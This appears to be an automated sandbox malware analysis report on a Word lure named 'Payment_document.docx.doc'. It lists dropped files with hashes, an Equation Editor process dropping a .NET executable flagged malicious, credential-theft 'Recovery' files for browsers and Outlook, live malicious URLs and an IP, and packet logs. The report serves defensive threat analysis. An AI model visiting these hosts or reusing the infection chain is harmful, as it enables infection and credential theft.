                                              Preview:............1.1.1.2.0.5.8.9...7.]...@.?.>.].=.1.2._.@.+.+.;.!.`.$.%...$.6.?.<.^.<.?..._.`.;.?.2.'.....&.&.9.:.....,.8.&.%...?.*...?.?.?.~.?.].0.%.?.?.1.?...<.../.4.%.+.`.;.%.'.,.(.?.?.5.?.&.*.9.`._.-.=.].~.^.-.|.2.%.+.[.`.[.%.0...|.=.*.[.~.=.).?.-.>...'.$.=.9.6.^.7.%./.%.2.+.9...1.1.=.2...?.6.?...,.....'.[.'.1...-.+.?.?.~.6.;.[.@...?.?.4.'.`.?./.@.=.&.?.?.|...>.%.?./.;.?.1.^.+.-.+.&._.?.).(.>...?.(.?.>.4.3.^.[.../.(.0.=...2.8.?.`.5.?.2.3.?.>.3...6.:.?.].7.|.-.].8.8.#._.;._...%.^.`.1.$.?.>./...3.'.%.~.^.+.?.^.?.-.$.?./.(.)._.~.^.0.?...=.(.+.).&.).>.,.<.<...$.$.!.%.~.].2.&.%...|.>.=.(.#.@.;.3.%...?.?.*.3.#.?.?.:.?.?.7.@.).%.|.,.+.).`.;.?.`.:.2.$.@.*.(.|.@.5.<.?...(.-...|.*.+.<...,.*.8.?.%.~.^.9.?.?.^._.<.;.4./.?.....;.;.%.+.?.8...%.).7.?.#._.1.?.?.3.!._.^.?.!.*.&.?.2.?.#.@.?.?.&.~.|.?.@.#.8.5.9.8.`.@.[...2.|.;.<.>.|...@.$.5.,.=.+.'.`...5.1.[.).?.9.1.1.[._.(.0.&...7.%.`.7.5.).(.$.!.,.:.'.-._.`.?.%.<.3.%.!.@.5.^.;.%.?.(.0.?.6.2...?.|.?.<.5./.>.?.#.4.*.2.'.:.?.`.*.?./.~.<.1.?._.>.%.9.4.2.#.

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{63C6D9D7-27DA-4EFD-952B-08CA7C8896ED}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):0.11299086186625841
                                              Encrypted:false
                                              SSDEEP:3:llYdltn/lLQ+n:A3K+
                                              MD5:3E63486E4BEB395BEDDF4EADC8EAA7DF
                                              SHA1:3B1D6276345408B5F320AEE4A73AE71EF79ED78C
                                              SHA-256:5DAEC42472B3B45BA0D38072709BFEE8956D67AED379B39273758475162DB75F
                                              SHA-512:321453C0BF34BBFD094BA75B85BC3E15D7FE053F10F2BF3D89B926593DB02DA59970F8D619ACB46378753739C164396DE3A97A970D1A2F07E0441F7D24C073F1
                                              Malicious:false
                                              Preview:../.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7C3C92C-1140-4E43-A415-F39DE2B8E989}.tmp

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\{10EF4456-1EFB-4813-94EE-93800FCCABB6}

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.02544436923930457
                                              Encrypted:false
                                              SSDEEP:6:I3DPcZu0uRz9svxggLRa/ywunAvxTi9HDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPIsV96WEsT2vYg3J/
                                              MD5:10A2529BFF0DAB0242AD9DB915D48A6B
                                              SHA1:02A977AAF5910BFBC1A7EA4F15C1E93FA5E0D845
                                              SHA-256:C07F9580F97F32AC5EF28D9EDB755FA729C7D5BF0D7A91A67EE6C733E2347FC4
                                              SHA-512:74029CFA7D7FC9DE1AF6820E1FC63C1D909BDA2ECAECBE3C48B58B7075CD2EEAE5E92471815C33DAD4794AB57EF60F596BAEC024CCA5C46036B935419048D14F
                                              Malicious:false
                                              Preview:......M.eFy...z.K....KI..V.P...S,...X.F...Fa.q.............................dlW.KK..?..J.........(....VN.I41.E.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\{6579DD26-1CA3-42CB-9614-5974C80F0F56}

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):131072
                                              Entropy (8bit):0.025546871135903853
                                              Encrypted:false
                                              SSDEEP:6:I3DPcg7qHvxggLRgzltk4l3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP+Pcjk4lRvYg3J/
                                              MD5:5832A9F653BD51EA2CE258C13C6AABB0
                                              SHA1:5C1BAB0414566B74A6E513CE1035AB3D345DA65C
                                              SHA-256:7587FB64A4EEA9815501D4677DA9EC1F5CC5162A0FC9B31B41DD05742275420F
                                              SHA-512:A7957465FD517A137377318F4E4F2CFA1D46DB1DD73158A89B12A79D27DD07DDBD074FE15289AC4AC4F7326CDDEB47DFFEADFC3EB9FF017C8A3C199187FBBF46
                                              Malicious:false
                                              Preview:......M.eFy...z......3B....x.[.S,...X.F...Fa.q............................e..O..A.efl..q..........|.f...C.yF..Y.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\4163BP8B\416logim.jpeg

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                              Category:dropped
                                              Size (bytes):82713
                                              Entropy (8bit):7.654044325371131
                                              Encrypted:false
                                              SSDEEP:1536:CIBpef54VOYkIzSCzFkVl4VLVjjjjWjjjjC1P2gj7skkkkkkkkkkkkkkkkD/s2:LBTVvqCiVl+VjjjjWjjjjCLj7skkkkk4
                                              MD5:E2C9A4F9EEF68CA4DD2971596DADB04F
                                              SHA1:6ED11A6CFDEFB840B3588D03836097FFBCE01DCC
                                              SHA-256:2E370A052B84128C0CF81378725F71EDB4DFFE9EF869533287E220B42A40E938
                                              SHA-512:7F6F795309F5643D2DB95A067C5FEE6EEE5CAE3ACCE086CC86339578293D35A21B02C8CB6A29D2B6BF00CA9C561B5B9F8115D90F8D633476ABFADE9C8500C568
                                              Malicious:false
                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.../.`...Z.....C#..p.T2...j..<..#...."....`~....J........!.d...n..L.......iW..}...m.%......z..E.s...?...{.?k.o....n..ZN.s:b[..A....8....mB.X[y.7.NFq..YZ.g.~.'....;S.N.4.BBI!F#..7.*pR......mI...H...p...d...x.|G..x...IL[Y.N.9.?.\m...~..E..,.-..W=1.9.3.Z?.d...B.....8.k**4...u....v..E..G.H$g.u...Z..^..p...B.LEf....M..=.S..BYi.P...(.F.y.}.w4f..<.Z=.

                                              C:\Users\user\AppData\Roaming\4163BP8B\416logrc.ini

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1186
                                              Entropy (8bit):3.543237356481468
                                              Encrypted:false
                                              SSDEEP:24:YUd8ajKfZgUa7b50d8ajKokH+gUca7b50d8a27Ud7gScpD7b5G:bdxNWdxpy3hdY7W
                                              MD5:B6F6B80F993B55D8ED9E7F370E6A02CA
                                              SHA1:1150DF247BD297232F75A55213925D7D8BFD2BAA
                                              SHA-256:3346A7789063EA6E27C7526CC9171F5CC2B4E0FB8AA8D09A3A90D920465F5429
                                              SHA-512:B8B31B7011263D245270628E452BE4C68684B76D6DA3E4B0EB457AA6F37ACEE900807EF7CCAB0496E37E87D5A420814A6476E75274EDBF52411BC9730FDBD9E8
                                              Malicious:false
                                              Preview:....O.u.t.l.o.o.k. .R.e.c.o.v.e.r.y.....c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...4.7.8.3.7.6.8.8.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.m.e...O.M.S.A.B. .....M.A.P.I. .P.r.o.v.i.d.e.r...2.....A.c.c.o.u.n.t. .N.a.m.e...M.o.b.i.l.e. .A.d.d.r.e.s.s. .B.o.o.k. .....P.r.e.f.e.r.e.n.c.e.s. .U.I.D... . . . . . . . .........c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...4.7.8.3.7.6.8.8.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.m.e...C.O.N.T.A.B. .....M.A.P.I. .P.r.o.v.i.d.e.r...2.....A.c.c.o.u.n.t. .N.a.m.e...O.u.t.l.o.o.k. .A.d.d.r.e.s.s. .B.o.o.k. .....P.r.e.f.e.r.e.n.c.e.s. .U.I.D... . . . . . . . .........c.l.s.i.d...{.E.D.4.7.5.4.1.4.-.B.0.D.6.-.1.1.D.2.-.8.C.3.B.-.0.0.1.0.4.B.2.A.6.6.7.6.}. .....M.i.n.i. .U.I.D...3.2.4.6.8.9.4.6.4.0.....S.e.r.v.i.c.e. .U.I.D... . . . . . . . .....S.e.r.v.i.c.e. .N.a.

                                              C:\Users\user\AppData\Roaming\4163BP8B\416logrf.ini

                                              Download File
                                              Process:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):40
                                              Entropy (8bit):2.8420918598895937
                                              Encrypted:false
                                              SSDEEP:3:VSiftlAlGQJhIl:VSVlGQPY
                                              MD5:2F245469795B865BDD1B956C23D7893D
                                              SHA1:6AD80B974D3808F5A20EA1E766C7D2F88B9E5895
                                              SHA-256:1662D01A2D47B875A34FC7A8CD92E78CB2BA7F34023C7FD2639CBB10B8D94361
                                              SHA-512:909F189846A5D2DB208A5EB2E7CB3042C0F164CAF437E2B1B6DE608C0A70E4F3510B81B85753DBEEC1E211E6A83E6EA8C96AFF896E9B6E8ED42014473A54DC4F
                                              Malicious:true
                                              Preview:....F.i.r.e.f.o.x. .R.e.c.o.v.e.r.y.....

                                              C:\Users\user\AppData\Roaming\4163BP8B\416logri.ini

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):40
                                              Entropy (8bit):2.8420918598895937
                                              Encrypted:false
                                              SSDEEP:3:+slXllAGQJhIl:dlIGQPY
                                              MD5:D63A82E5D81E02E399090AF26DB0B9CB
                                              SHA1:91D0014C8F54743BBA141FD60C9D963F869D76C9
                                              SHA-256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
                                              SHA-512:38AFB05016D8F3C69D246321573997AAAC8A51C34E61749A02BF5E8B2B56B94D9544D65801511044E1495906A86DC2100F2E20FF4FCBED09E01904CC780FDBAD
                                              Malicious:true
                                              Preview:....I.e.x.p.l.o.r. .R.e.c.o.v.e.r.y.....

                                              C:\Users\user\AppData\Roaming\4163BP8B\416logrv.ini

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmmon32.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):40
                                              Entropy (8bit):2.96096404744368
                                              Encrypted:false
                                              SSDEEP:3:AJlbeGQJhIl:tGQPY
                                              MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
                                              SHA1:24CB89501F0212FF3095ECC0ABA97DD563718FB1
                                              SHA-256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
                                              SHA-512:ECD07E601FC9E3CFC39ADDD7BD6F3D7F7FF3253AFB40BF536E9EAAC5A4C243E5EC40FBFD7B216CB0EA29F2517419601E335E33BA19DEA4A46F65E38694D465BF
                                              Malicious:true
                                              Preview:...._._.V.a.u.l.t. .R.e.c.o.v.e.r.y.....

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Payment_document.docx.LNK

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:46:41 2022, mtime=Tue Mar 8 15:46:41 2022, atime=Tue Jun 13 17:00:57 2023, length=167693, window=hide
                                              Category:dropped
                                              Size (bytes):1069
                                              Entropy (8bit):4.602477794816804
                                              Encrypted:false
                                              SSDEEP:12:8RHV9RgXg/XAlCPCHaXY1MByB/oxdvX+W7fwzcPCtKicvbzgeNrlL8a2DtZ3Yilb:8F/XTIyYABf+cOheAe9RCDv3qa+yA7yJ
                                              MD5:B7012764FAB149E3263777609FCA30D0
                                              SHA1:15F0F189E2EA13F5BDBC4300DF9127459705708E
                                              SHA-256:9C3EBC0E9444DCA8414003C1F6C89E00E9A45A312C801E9A2F44C66684F32F9E
                                              SHA-512:BAA4A2BD4F6DD6C23402DD32F143699B1A54E656FAE2DE7567E2596B55C35E61C17AFD0C31CA0AA7A0F87B009A27FBA35399B64E08EDC69F538D45C3B7E5702A
                                              Malicious:false
                                              Preview:L..................F.... ...."...3..."...3..t.3.!................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT...user.8......QK.XhT.*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2......V.. .PAYMEN~1.DOC..`......hT.hT.*.../.....4...............P.a.y.m.e.n.t._.d.o.c.u.m.e.n.t...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\760639\Users.user\Desktop\Payment_document.docx.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.a.y.m.e.n.t._.d.o.c.u.m.e.n.t...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......760639.........

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Generic INItialization configuration [doc]
                                              Category:dropped
                                              Size (bytes):132
                                              Entropy (8bit):4.879484515242974
                                              Encrypted:false
                                              SSDEEP:3:bDuMJlSxmswxFXFVeL/HpR1fpSmX1OeL/HpR1fpSv:bC0xtFVe9zfpEe9zfpc
                                              MD5:C575CCBA6D1F7F1E5216B15B6C04BA53
                                              SHA1:1B2BB5B9A260D95B5B613A1DD560388A440DC82B
                                              SHA-256:74B476B3732CDF12D512D389393655BFE1E1C2F0C4E113969FC5A6B07D9314E3
                                              SHA-512:1C15028A220615E6644AF2642B2B3BE18F89E0CC0295183A52704E5286BDCBED6926079A2628F16968589558FDEC565C7DA2A9FA52B94D26287ABC139FAA96AB
                                              Malicious:false
                                              Preview:[folders]..Templates.LNK=0..oaeopb.url=0..we on 15.223.2.12.url=0..Payment_document.docx.LNK=0..[doc]..Payment_document.docx.LNK=0..

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\oaeopb.url

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows 95 Internet shortcut text (URL=<https://unesa.me/oaeopb>), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):49
                                              Entropy (8bit):4.443606211763083
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQYm2fh49y:HRYFVm4u0
                                              MD5:E82E1500B6C1E6FA996650BDADF76B0C
                                              SHA1:CECD3188E513E0626C1D54496464A10330EE6512
                                              SHA-256:F4FA202B6EB97118C694354E9D344EF613C9A61E75B36EBA7D2E9612FC742A2D
                                              SHA-512:6255DBECE8F73D3E60C78E2A8977406331C13A2B1DACE61CEB0D917F30B2CEE77ED6AA4A5687BFC314DD0A4BBA7BD0753B23A555C757D9D2CB5834FF60942DF1
                                              Malicious:false
                                              Preview:[InternetShortcut]..URL=https://unesa.me/oaeopb..

                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\we on 15.223.2.12.url

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows 95 Internet shortcut text (URL=<http://15.223.2.12/we/>), ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):48
                                              Entropy (8bit):4.4803885422075345
                                              Encrypted:false
                                              SSDEEP:3:HRAbABGQYm/DL2kivn:HRYFVm/Dhivn
                                              MD5:551FC6B6A089A59C31C03BF2B91FB203
                                              SHA1:8CF097DE668A2043AFF83AE9D18D28E925A3D7C1
                                              SHA-256:B7247A3C8AB6FB6E6B387CFD37390BD34A95068168469CDFA963307DE4ECEE19
                                              SHA-512:6C0B07A46B4E29128155B7E86FA8EFC4B6424B122781B7032707C004781ED81900046B21537B03EA7ACC50679FFD626119A570525110738ADCC9C55E023D7D12
                                              Malicious:false
                                              Preview:[InternetShortcut]..URL=http://15.223.2.12/we/..

                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.503835550707525
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                              MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                              SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                              SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                              SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                              C:\Users\user\Desktop\~$yment_document.docx.doc

                                              Download File
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.503835550707525
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                              MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                              SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                              SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                              SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                              Malicious:false
                                              Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                                              C:\Users\Public\cleanmgr_settings.exe

                                              Download File
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):847872
                                              Entropy (8bit):7.9692047719076005
                                              Encrypted:false
                                              SSDEEP:24576:jzIj6o9o//FfodxH+TXwo7w3G4W//b2yRKtCuf7N:jcj6oO1fodk4W/zsX
                                              MD5:CFF6C145EB350EA686F48866937E0A76
                                              SHA1:A2E7E3B13BB6C3D8BA38E350AFD7BB4164514407
                                              SHA-256:8614FECD71F9F61A8742B4AB97F28D154F2428B4E91A5A5B42A1E05F93CFA477
                                              SHA-512:E3AF67C14F4D85A656725BBC03A38FDE8ECEC3FA03B6AF973BAA18F596401B1A768ED1D6BF82513365609A1600EB914741902F98461DF40F0528F0158C252910
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....................0.................. ....@...... .......................@............`...@......@............... ............................... ..............................D................................................................ ..H............text........ ...................... ..`.rsrc........ ......................@..@........................................H........x...C...............H...........................................0..........+.(E.:7. .. ....c p.R.a(*... ..). Xk!.a(*... .... ....a(*...(.... ..E. r<M.a(*... .. ..R.a ...Va(*...o.... <..if ....a(*... E... 9h..a(*...o.... ...o .~.oa(*... .7w( b..(a(*...o.... !.. ....b ..T1a(*... 1... ....b ^.s.a(*...o......(..... >.. .+..a(*.... .JV. N).+X ..(6a(*.... ._d. 9.l.a(*... ..T. ...ka .-..a(*... ..C. ....c ....a(*...(......(....(............%....%.~.....%...%.............o.....

                                              Static File Info

                                              General

                                              File type:Microsoft Word 2007+
                                              Entropy (8bit):7.9956013784699325
                                              TrID:
                                              • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                              • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                              • ZIP compressed archive (8000/1) 7.92%
                                              File name:Payment_document.docx.doc
                                              File size:167693
                                              MD5:323d2e404ef99935d376f67fbbf10eda
                                              SHA1:b045a4d259bd2ca912858ea59b6c13153d57ae7a
                                              SHA256:5ed627e700cbe9474dc8077ef6ee3acbb46af4ed3d576da2058ce5e08ff922e7
                                              SHA512:44fa543b46a77ac5999509f3664d22ddc0d44efe36703d0c587fad4c738efb73c2ee0d5e420d31f11c28649769f6c03edf959f1ea15bfaa548b63085c3477528
                                              SSDEEP:3072:iOb7TzfMeFSONum4bxW9Sb8FPIQtfm6i4QXEwMmvzxcDxe8b9p:z3jMeH8TAPxe6iX0wMmlcVbp
                                              TLSH:68F312DA1742BBFAF2DA90FF453B750BE23121226EF111EED371C11C5AFA6461652223
                                              File Content Preview:PK.........4.V...Ut...........[Content_Types].xmlUT...2..d2..d2..d.T.N.0..#....U...B.i.,G.D....$..&{..=vR"TJ...D..o..=...L...0:'..O....BW9y.>.7$..t......x2.]^....>.h.s2G...z>..|f,.P).S...U.2..*.W..5.F#hL1r....J...<..v....$w..(...">....9Xv..d..>1.../<...$.

                                              File Icon

                                              Icon Hash:2764a3aaaeb7bdbf

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jun 13, 2023 11:01:04.099323988 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:04.099375963 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:04.099447012 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:04.115808964 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:04.115852118 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:04.724423885 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:04.724647045 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:04.743127108 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:04.743171930 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:04.743818045 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:04.743897915 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.001938105 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.044286013 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250272989 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250353098 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250382900 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250408888 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250437021 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250454903 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250468969 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250500917 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250503063 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250519991 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250559092 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250590086 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250641108 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250673056 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250715971 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250729084 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250766039 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.250809908 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.250855923 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.254620075 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.254642963 CEST44349181103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:05.254653931 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:05.254688978 CEST49181443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.015075922 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.015126944 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:06.015223026 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.016571045 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.016583920 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:06.609014988 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:06.609183073 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.619003057 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.619015932 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:06.619380951 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:06.643124104 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:06.688318968 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:07.044689894 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:07.044862986 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:07.045002937 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:07.045063972 CEST49182443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:07.045101881 CEST44349182103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:10.141172886 CEST49183443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:10.141223907 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:10.141288996 CEST49183443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:10.143208981 CEST49183443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:10.143225908 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:10.766129971 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:10.766424894 CEST49183443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:10.779622078 CEST49183443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:10.779656887 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:10.780335903 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:10.802655935 CEST49183443192.168.2.22103.242.124.88
                                              Jun 13, 2023 11:01:10.848284006 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:11.211591959 CEST44349183103.242.124.88192.168.2.22
                                              Jun 13, 2023 11:01:11.211652040 CEST44349183103.242.124.88192.168.2.22
